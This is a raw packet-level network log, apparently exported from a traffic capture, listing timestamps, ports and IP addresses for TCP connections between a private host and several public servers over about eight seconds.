Nov 26, 2024 00:25:30.118154049 CET	49774	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:30.118168116 CET	443	49774	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:30.745228052 CET	443	49772	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:30.749352932 CET	49772	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:30.749372959 CET	443	49772	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:30.750082970 CET	49772	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:30.750089884 CET	443	49772	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:31.226372957 CET	443	49772	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:31.226474047 CET	443	49772	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:31.226538897 CET	49772	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:31.249480009 CET	49772	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:31.249510050 CET	443	49772	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:31.249521971 CET	49772	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:31.249528885 CET	443	49772	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:31.411333084 CET	49775	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:31.411380053 CET	443	49775	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:31.411669016 CET	49775	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:31.482625961 CET	49775	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:31.482640028 CET	443	49775	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:31.634598017 CET	443	49773	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:31.680952072 CET	49773	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:31.901489019 CET	443	49774	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:31.948559999 CET	49774	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:31.965464115 CET	443	49767	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:31.977245092 CET	443	49770	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:32.017087936 CET	49767	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:32.032512903 CET	49770	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:32.672519922 CET	49770	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:32.672555923 CET	443	49770	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:32.673363924 CET	49770	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:32.673372984 CET	443	49770	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:32.673816919 CET	49773	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:32.673839092 CET	443	49773	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:32.674443960 CET	49773	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:32.674449921 CET	443	49773	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:32.692755938 CET	49774	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:32.692775965 CET	443	49774	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:32.693365097 CET	49774	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:32.693370104 CET	443	49774	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:32.693722963 CET	49767	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:32.693757057 CET	443	49767	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:32.694499969 CET	49767	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:32.694505930 CET	443	49767	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:33.024127960 CET	443	49773	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:33.024549961 CET	443	49773	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:33.024601936 CET	49773	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:33.034468889 CET	443	49774	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:33.034689903 CET	443	49774	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:33.034744978 CET	49774	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:33.044440031 CET	49773	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:33.044451952 CET	443	49773	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:33.044462919 CET	49773	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:33.044466972 CET	443	49773	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:33.046817064 CET	49774	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:33.046842098 CET	443	49774	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:33.046853065 CET	49774	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:33.046859026 CET	443	49774	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:33.097512007 CET	49706	443	192.168.2.6	20.190.177.146
Nov 26, 2024 00:25:33.097574949 CET	49706	443	192.168.2.6	20.190.177.146
Nov 26, 2024 00:25:33.203180075 CET	443	49775	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:33.219270945 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:33.219299078 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:33.219353914 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:33.219384909 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:33.220849991 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:33.251344919 CET	49775	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:33.251379967 CET	443	49775	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:33.252289057 CET	49775	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:33.252294064 CET	443	49775	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:33.261704922 CET	49782	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:33.261740923 CET	443	49782	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:33.261840105 CET	49782	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:33.262202024 CET	49782	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:33.262214899 CET	443	49782	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:33.319437981 CET	49783	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:33.319485903 CET	443	49783	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:33.319571972 CET	49783	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:33.359920025 CET	49783	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:33.359946966 CET	443	49783	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:33.453006983 CET	49784	443	192.168.2.6	94.245.104.56
Nov 26, 2024 00:25:33.453053951 CET	443	49784	94.245.104.56	192.168.2.6
Nov 26, 2024 00:25:33.453119040 CET	49784	443	192.168.2.6	94.245.104.56
Nov 26, 2024 00:25:33.453423977 CET	49784	443	192.168.2.6	94.245.104.56
Nov 26, 2024 00:25:33.453438997 CET	443	49784	94.245.104.56	192.168.2.6
Nov 26, 2024 00:25:33.676877022 CET	443	49775	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:33.676954985 CET	443	49775	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:33.677048922 CET	49775	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:33.734390020 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:33.734447956 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:33.734503984 CET	49706	443	192.168.2.6	20.190.177.146
Nov 26, 2024 00:25:33.738617897 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:33.738718033 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:33.738765001 CET	49706	443	192.168.2.6	20.190.177.146
Nov 26, 2024 00:25:33.747180939 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:33.747308969 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:33.747353077 CET	49706	443	192.168.2.6	20.190.177.146
Nov 26, 2024 00:25:33.755749941 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:33.755855083 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:33.755903959 CET	49706	443	192.168.2.6	20.190.177.146
Nov 26, 2024 00:25:33.764267921 CET	443	49706	20.190.177.146	192.168.2.6
Nov 26, 2024 00:25:33.812098980 CET	49706	443	192.168.2.6	20.190.177.146
Nov 26, 2024 00:25:34.016658068 CET	49775	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:34.016686916 CET	443	49775	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:34.016710043 CET	49775	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:34.016717911 CET	443	49775	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:34.600509882 CET	49785	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:34.600547075 CET	443	49785	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:34.600652933 CET	49785	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:34.680846930 CET	80	49763	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:34.680917978 CET	49763	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:34.822284937 CET	49785	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:34.822303057 CET	443	49785	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:35.047339916 CET	443	49782	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:35.144748926 CET	443	49783	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:35.203095913 CET	443	49784	94.245.104.56	192.168.2.6
Nov 26, 2024 00:25:35.210916996 CET	49783	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:35.241679907 CET	49782	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:35.323473930 CET	443	49770	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:35.323544025 CET	443	49770	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:35.323664904 CET	49770	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:35.338433981 CET	443	49767	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:35.338696957 CET	443	49767	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:35.338835955 CET	49767	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:35.407336950 CET	443	49784	94.245.104.56	192.168.2.6
Nov 26, 2024 00:25:35.407756090 CET	49784	443	192.168.2.6	94.245.104.56
Nov 26, 2024 00:25:35.459302902 CET	49784	443	192.168.2.6	94.245.104.56
Nov 26, 2024 00:25:35.459331036 CET	443	49784	94.245.104.56	192.168.2.6
Nov 26, 2024 00:25:35.460726976 CET	443	49784	94.245.104.56	192.168.2.6
Nov 26, 2024 00:25:35.460807085 CET	49784	443	192.168.2.6	94.245.104.56
Nov 26, 2024 00:25:35.504019976 CET	49784	443	192.168.2.6	94.245.104.56
Nov 26, 2024 00:25:35.504188061 CET	443	49784	94.245.104.56	192.168.2.6
Nov 26, 2024 00:25:35.504234076 CET	49784	443	192.168.2.6	94.245.104.56
Nov 26, 2024 00:25:35.547343016 CET	443	49784	94.245.104.56	192.168.2.6
Nov 26, 2024 00:25:35.569612980 CET	49782	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:35.569632053 CET	443	49782	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:35.570221901 CET	49782	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:35.570228100 CET	443	49782	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:35.570389986 CET	49767	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:35.570415974 CET	443	49767	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:35.570427895 CET	49767	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:35.570436001 CET	443	49767	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:35.583250999 CET	49783	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:35.583276987 CET	443	49783	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:35.583823919 CET	49783	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:35.583832026 CET	443	49783	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:35.600492001 CET	49770	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:35.600588083 CET	443	49770	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:35.600622892 CET	49770	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:35.600641966 CET	443	49770	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:35.711380959 CET	443	49784	94.245.104.56	192.168.2.6
Nov 26, 2024 00:25:35.711503983 CET	49784	443	192.168.2.6	94.245.104.56
Nov 26, 2024 00:25:35.790127993 CET	49791	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:35.790169001 CET	443	49791	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:35.790273905 CET	49791	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:35.803721905 CET	49791	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:35.803735971 CET	443	49791	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:35.805356026 CET	49792	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:35.805391073 CET	443	49792	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:35.805695057 CET	49792	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:35.810838938 CET	49792	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:35.810854912 CET	443	49792	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:35.862202883 CET	49763	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:35.862490892 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:35.901201010 CET	443	49784	94.245.104.56	192.168.2.6
Nov 26, 2024 00:25:35.901293993 CET	443	49784	94.245.104.56	192.168.2.6
Nov 26, 2024 00:25:35.901350975 CET	49784	443	192.168.2.6	94.245.104.56
Nov 26, 2024 00:25:35.911809921 CET	49784	443	192.168.2.6	94.245.104.56
Nov 26, 2024 00:25:35.911819935 CET	443	49784	94.245.104.56	192.168.2.6
Nov 26, 2024 00:25:35.914123058 CET	443	49782	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:35.914216042 CET	443	49782	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:35.914293051 CET	49782	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:35.918123007 CET	49782	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:35.918134928 CET	443	49782	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:35.918145895 CET	49782	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:35.918152094 CET	443	49782	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:35.923681021 CET	49796	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:35.923710108 CET	443	49796	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:35.923846960 CET	49796	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:35.924566031 CET	49796	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:35.924577951 CET	443	49796	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:35.949821949 CET	443	49783	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:35.950186014 CET	443	49783	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:35.950237036 CET	49783	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:35.950671911 CET	49783	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:35.950690031 CET	443	49783	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:35.950700998 CET	49783	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:35.950706005 CET	443	49783	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:35.959120989 CET	49797	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:35.959158897 CET	443	49797	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:35.959238052 CET	49797	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:35.960871935 CET	49797	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:35.960885048 CET	443	49797	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:35.983436108 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:35.983468056 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:35.983546019 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:35.983758926 CET	80	49763	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:35.984236002 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:35.984328032 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:35.986212015 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:35.986228943 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:35.990187883 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:35.990236044 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:36.096817017 CET	49799	443	192.168.2.6	2.16.158.41
Nov 26, 2024 00:25:36.096904039 CET	443	49799	2.16.158.41	192.168.2.6
Nov 26, 2024 00:25:36.097012997 CET	49799	443	192.168.2.6	2.16.158.41
Nov 26, 2024 00:25:36.097255945 CET	49799	443	192.168.2.6	2.16.158.41
Nov 26, 2024 00:25:36.097296953 CET	443	49799	2.16.158.41	192.168.2.6
Nov 26, 2024 00:25:36.110057116 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:36.110178947 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:36.110250950 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:36.110312939 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:36.182099104 CET	49800	443	192.168.2.6	20.198.119.143
Nov 26, 2024 00:25:36.182135105 CET	443	49800	20.198.119.143	192.168.2.6
Nov 26, 2024 00:25:36.182291985 CET	49800	443	192.168.2.6	20.198.119.143
Nov 26, 2024 00:25:36.182959080 CET	49800	443	192.168.2.6	20.198.119.143
Nov 26, 2024 00:25:36.182972908 CET	443	49800	20.198.119.143	192.168.2.6
Nov 26, 2024 00:25:36.737782001 CET	49801	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:36.737818003 CET	443	49801	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:36.737895012 CET	49801	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:36.738061905 CET	49802	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:36.738090038 CET	443	49802	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:36.738153934 CET	49802	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:36.738424063 CET	49801	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:36.738444090 CET	443	49801	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:36.738555908 CET	49802	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:36.738576889 CET	443	49802	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:36.772557020 CET	49805	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:36.772583961 CET	443	49805	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:36.772640944 CET	49805	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:36.773468018 CET	49805	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:36.773483038 CET	443	49805	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:37.526124001 CET	443	49791	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:37.534727097 CET	49812	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:37.534770012 CET	443	49812	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:37.535048008 CET	49812	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:37.535394907 CET	49812	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:37.535413980 CET	443	49812	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:37.543940067 CET	49791	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:37.543962002 CET	443	49791	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:37.544631004 CET	49791	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:37.544636965 CET	443	49791	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:37.560386896 CET	49813	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:37.560421944 CET	443	49813	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:37.560699940 CET	49813	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:37.561074018 CET	49814	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:37.561084986 CET	443	49814	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:37.561301947 CET	49814	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:37.561420918 CET	49813	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:37.561434031 CET	443	49813	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:37.561583042 CET	49814	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:37.561593056 CET	443	49814	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:37.660916090 CET	443	49792	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:37.736504078 CET	49792	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:37.736522913 CET	443	49792	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:37.738359928 CET	49792	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:37.738365889 CET	443	49792	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:37.745222092 CET	443	49799	2.16.158.41	192.168.2.6
Nov 26, 2024 00:25:37.745472908 CET	443	49797	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:37.751682043 CET	49797	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:37.751703024 CET	443	49797	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:37.752222061 CET	49797	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:37.752228022 CET	443	49797	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:37.753217936 CET	49799	443	192.168.2.6	2.16.158.41
Nov 26, 2024 00:25:37.753249884 CET	443	49799	2.16.158.41	192.168.2.6
Nov 26, 2024 00:25:37.754966021 CET	443	49799	2.16.158.41	192.168.2.6
Nov 26, 2024 00:25:37.755068064 CET	49799	443	192.168.2.6	2.16.158.41
Nov 26, 2024 00:25:37.776179075 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:37.803020954 CET	49799	443	192.168.2.6	2.16.158.41
Nov 26, 2024 00:25:37.803250074 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:37.803267002 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:37.803374052 CET	443	49799	2.16.158.41	192.168.2.6
Nov 26, 2024 00:25:37.803884029 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:37.803905964 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:37.803965092 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:37.803972960 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:37.803997993 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:37.804017067 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:37.804620981 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:37.809727907 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:37.809884071 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:37.815100908 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:37.815113068 CET	443	49798	172.217.19.225	192.168.2.6
Nov 26, 2024 00:25:37.879789114 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:37.881582022 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:37.909936905 CET	49799	443	192.168.2.6	2.16.158.41
Nov 26, 2024 00:25:37.909969091 CET	443	49799	2.16.158.41	192.168.2.6
Nov 26, 2024 00:25:37.910113096 CET	49798	443	192.168.2.6	172.217.19.225
Nov 26, 2024 00:25:37.954574108 CET	443	49801	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:37.981419086 CET	443	49791	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:37.981494904 CET	443	49791	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:37.981756926 CET	49791	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:38.029972076 CET	443	49805	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.040199041 CET	443	49802	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.109693050 CET	49799	443	192.168.2.6	2.16.158.41
Nov 26, 2024 00:25:38.110851049 CET	49801	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.125745058 CET	49802	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.125757933 CET	443	49802	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.126180887 CET	49805	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.126198053 CET	443	49805	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.126847029 CET	49801	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.126857996 CET	443	49801	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.127372980 CET	443	49805	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.127382040 CET	443	49805	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.127432108 CET	49805	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.127474070 CET	443	49802	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.127494097 CET	443	49802	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.127537966 CET	49802	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.129393101 CET	443	49801	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.129407883 CET	443	49801	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.129451990 CET	49801	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.132566929 CET	49805	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.132638931 CET	443	49805	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.134198904 CET	49802	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.134293079 CET	443	49802	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.134315014 CET	49805	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.134324074 CET	443	49805	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.135711908 CET	443	49792	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:38.135777950 CET	443	49792	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:38.135840893 CET	49792	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:38.139153957 CET	49802	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.139163017 CET	443	49802	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.140695095 CET	49801	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.140898943 CET	443	49801	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.141177893 CET	49801	443	192.168.2.6	162.159.61.3
Nov 26, 2024 00:25:38.141185999 CET	443	49801	162.159.61.3	192.168.2.6
Nov 26, 2024 00:25:38.142398119 CET	49791	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:38.142398119 CET	49791	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:38.142417908 CET	443	49791	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:38.142427921 CET	443	49791	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:38.144371033 CET	49792	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:38.144378901 CET	443	49792	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:38.180226088 CET	49815	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:38.180275917 CET	443	49815	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:38.180366039 CET	49815	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:38.188088894 CET	49816	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:38.188134909 CET	443	49816	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:38.188189030 CET	49816	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:38.188827038 CET	49815	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:38.188843966 CET	443	49815	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:38.190331936 CET	49816	443	192.168.2.6	13.107.246.63
